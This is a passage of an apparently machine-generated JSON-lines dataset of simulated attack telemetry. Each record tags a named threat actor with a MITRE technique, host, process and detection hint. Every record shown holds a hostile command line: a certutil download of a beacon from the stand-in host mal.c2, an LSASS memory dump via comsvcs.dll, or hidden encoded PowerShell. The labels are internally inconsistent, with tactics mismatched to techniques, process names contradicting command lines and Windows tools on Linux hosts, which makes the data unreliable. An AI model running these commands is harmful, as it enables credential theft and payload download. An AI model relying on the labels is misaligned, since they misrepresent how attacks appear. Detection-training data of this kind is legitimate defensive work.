{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Exfiltration","Credential Access","Collection"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250604T120941000Z_0006143","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.4.248.146","name":"APP-WEB-6P4IVMYJ8P","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6143Lapsus$T1071.001"},"network":{"domain":"github.com","dst_ip":"1.95.185.168","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-13T09:17:25.000Z","user":{"name":"arn:aws:iam::ykrro1as5vuv","sid":"S-1-5-21-952733543-805103949-2262"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Impact","Command and Control"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260419T001300000Z_0006145","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.196.150.121","name":"WIN-FIN-SRV-HTFN5J9COR","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6145Volt TyphoonT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.116.253.93","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-04T11:56:44.000Z","user":{"name":"CORP\\ot1005i4ngjk","sid":"S-1-5-21-945743879-135187659-1954"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Discovery"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20261127T185958000Z_0006147","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.72.167.7","name":"WIN-FIN-SRV-GJ0BXPHODR","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6147Lapsus$T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.93.104.133","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2852 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-14T16:59:11.000Z","user":{"name":"i-1b4c8t1uj2fp","sid":"S-1-5-21-784249816-474284754-2255"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Reconnaissance","Command and Control"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20250516T194337000Z_0006149","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.127.239.235","name":"IAM-ROLE-AJB350JK3P","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6149APT41T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.171.55.7","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-08-20T16:48:09.000Z","user":{"name":"svc_sg2bcgkoldmb","sid":"S-1-5-21-430395920-180972924-9543"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Defense Evasion","Collection","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20250701T222547000Z_0006151","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.26.180.16","name":"AZURE-VM-6PCBA0VRDT","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6151Scattered SpiderT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.30.197.59","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-14T05:18:00.000Z","user":{"name":"i-ssln8meena4b","sid":"S-1-5-21-481222548-361826755-6677"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Credential Access"],"technique_id":"T1531"},"event_id":"evt_apt41_20261218T045136000Z_0006153","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.247.192.216","name":"EC2-INST-2P4PTKG05E","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6153APT41T1531"},"network":{"domain":"github.com","dst_ip":"1.6.73.15","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 936 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-27T20:55:30.000Z","user":{"name":"CORP\\37m8v28rxl36","sid":"S-1-5-21-669693633-600236998-2328"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution","Reconnaissance","Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20250628T164822000Z_0006155","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.111.3.122","name":"WIN-FIN-SRV-2WH7ABAYM7","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6155UNC4841T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.161.189.86","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-20T07:29:09.000Z","user":{"name":"arn:aws:iam::shidjzqyc4ho","sid":"S-1-5-21-669046333-643450642-1795"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation","Discovery","Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20250122T063859000Z_0006157","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.224.156.176","name":"APP-WEB-L5WSBBMG4R","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6157Volt TyphoonT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.59.85.234","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1096 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-20T02:05:28.000Z","user":{"name":"svc_hx61qa5ogjsp","sid":"S-1-5-21-497036488-495533323-7140"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Initial Access","Command and Control"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260425T181617000Z_0006159","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.75.211.97","name":"DB-ORACLE-EE185LCT9O","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6159UNC4841T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.111.186.160","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-10-11T11:55:56.000Z","user":{"name":"i-h98f6f6iczwa","sid":"S-1-5-21-522465547-945962867-1718"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration"],"technique_id":"T1570"},"event_id":"evt_apt29_20260716T023739000Z_0006161","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.74.184.191","name":"APP-WEB-DZSTP7WL7T","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6161APT29T1570"},"network":{"domain":"github.com","dst_ip":"1.117.193.121","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-30T03:24:47.000Z","user":{"name":"arn:aws:iam::87g912j04499","sid":"S-1-5-21-421160872-484963271-2242"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20250710T182335000Z_0006163","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.203.28.68","name":"EC2-INST-UOJ7B88W1B","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6163APT29T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.48.249.108","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1402 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-13T04:30:31.000Z","user":{"name":"azuread\\iagn17txxe1t","sid":"S-1-5-21-246185274-407079256-1163"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Command and Control","Reconnaissance","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20260926T124251000Z_0006165","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.108.172.200","name":"AZURE-VM-A49ZY2HXHJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6165Mustang PandaT1071.001"},"network":{"domain":"github.com","dst_ip":"1.101.126.153","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3203 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-17T15:09:57.000Z","user":{"name":"CORP\\inuvneav3e9r","sid":"S-1-5-21-815326068-511250331-9178"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Initial Access"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20261220T073501000Z_0006167","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.96.223.193","name":"WIN-FIN-SRV-3CUAHRL90G","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6167FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.104.41.66","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-05T17:27:24.000Z","user":{"name":"CORP\\y6ax6kag6hbq","sid":"S-1-5-21-473142820-533199057-8597"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Persistence","Lateral Movement","Impact"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20250501T144947000Z_0006169","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.174.132.161","name":"EC2-INST-3LTQS8OXPX","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6169Lapsus$T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.90.34.48","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-24T11:20:19.000Z","user":{"name":"CORP\\fsgsflnq9woi","sid":"S-1-5-21-140786549-295640993-1268"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250805T064636000Z_0006171","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.97.176.177","name":"APP-WEB-QVD3RGZPPD","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6171Lapsus$T1546.003"},"network":{"domain":"github.com","dst_ip":"1.87.48.14","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-09-21T03:29:05.000Z","user":{"name":"i-hquq8nrvkno0","sid":"S-1-5-21-558265953-503942129-2953"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20250609T020111000Z_0006173","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.89.128.176","name":"APP-WEB-5WCQ2TQ2MN","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6173UNC4841T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.107.162.152","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 599 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-06-03T14:12:07.000Z","user":{"name":"CORP\\jhlsymrotl7p","sid":"S-1-5-21-810259068-999597806-8998"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Persistence","Collection","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20260808T130933000Z_0006175","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.108.11.174","name":"EC2-INST-CUYP6LE3ST","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6175Lapsus$T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.54.84.169","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-01-01T02:58:56.000Z","user":{"name":"arn:aws:iam::rojrbo0j5icm","sid":"S-1-5-21-267113960-241585309-3624"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20261018T051204000Z_0006177","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.29.23.77","name":"IAM-ROLE-JR6HLA43RS","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6177APT29T1071.001"},"network":{"domain":"github.com","dst_ip":"1.170.93.173","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-06T02:32:31.000Z","user":{"name":"azuread\\j6ydk0weirqo","sid":"S-1-5-21-965284992-284772340-3345"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250921T062755000Z_0006179","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.203.12.35","name":"WIN-FIN-SRV-5PX3GVLQTL","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6179Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.24.150.230","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3781 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-31T09:48:21.000Z","user":{"name":"azuread\\952mfc2khs26","sid":"S-1-5-21-524380814-813669093-3327"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control","Impact","Lateral Movement"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20260105T072214000Z_0006181","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.91.126.58","name":"WIN-FIN-SRV-HQEIOSVQYS","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6181APT29T1546.003"},"network":{"domain":"github.com","dst_ip":"1.26.206.64","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1442 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-28T15:12:51.000Z","user":{"name":"azuread\\bntqu806tmz0","sid":"S-1-5-21-432128946-536778449-3570"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Initial Access","Discovery","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20260221T143431000Z_0006183","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.63.4.210","name":"IAM-ROLE-ONTTGZZE8S","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6183APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.68.96.127","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-05T02:13:27.000Z","user":{"name":"CORP\\24uhawhbe7e5","sid":"S-1-5-21-499878746-155522126-1060"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement","Collection"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20250223T203729000Z_0006185","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.121.113.173","name":"WIN-FIN-SRV-7U46WLBTSX","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6185Mustang PandaT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.32.90.82","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-08-19T07:02:07.000Z","user":{"name":"arn:aws:iam::8wxbsp45o5ab","sid":"S-1-5-21-584549627-718857402-9502"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Impact"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260612T052904000Z_0006187","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.28.126.240","name":"AZURE-VM-DI6WHWUMAW","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6187Volt TyphoonT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.136.234.23","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-28T16:47:03.000Z","user":{"name":"arn:aws:iam::8ycttm1sfjuz","sid":"S-1-5-21-771084915-746477362-7050"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20260114T181803000Z_0006189","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.163.0.186","name":"WIN-FIN-SRV-J6HGW9LOJD","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6189UNC4841T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.143.132.183","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 547 C:\\temp\\lsass.dmp 